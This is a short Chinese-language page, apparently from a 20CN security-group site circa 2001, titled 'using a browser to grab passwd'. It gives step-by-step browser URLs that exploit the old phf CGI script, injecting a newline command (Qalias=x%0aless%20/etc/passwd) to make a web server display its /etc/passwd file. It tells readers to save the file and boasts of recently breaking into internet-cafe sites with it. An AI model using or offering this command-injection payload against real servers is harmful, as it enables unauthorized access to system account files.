您当前的位置 >> 首页     

利用浏览器抓passwd

/ns/cn/jc/data/20010127073245.htm

可 以 用 WWW Browser 抓 /etc/passwd ???? 那 当 然 !!
[1] 用 WWW Browser 连 到 yournet.net
[2] Location 输 入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接 著 如 果 出 来 一 份 像 Report 的 画 面 的 话 , 接 著 输 入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发 生 了 甚 么 事 ?? etc/passwd 在 你 的 浏 览 器 中 " 显 示 " 出 来
了 !! 快 点 Save 吧 !!

这 个 方 法 管 不 管 用 ?? 依 各 系 统 所 使 用 的 WWW Server 软 体 不
同 而 有 差 异 , 所 以 如 果 你 在 选 购 WWW Server 软 体 的 时 候 也
请 注 意 一 下 它 的 安 全 性 , 不 一 定 名 牌 的 就 好 , 像 这 个 Hole...
当 然 这 个 方 法 曾 经 管 用 过 , 至 少 两 天 前 还 试 过 它 可 以 破 解
一 两 个 " 网 路 咖 啡 " 的 站 台 (<--- 又 是 , 安 全 性 值 得 讨 论 )!!

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Network Security Group.
All Rights Reserved.
W3C XHTML 1.0 Strict & CSS 1.2 Valid.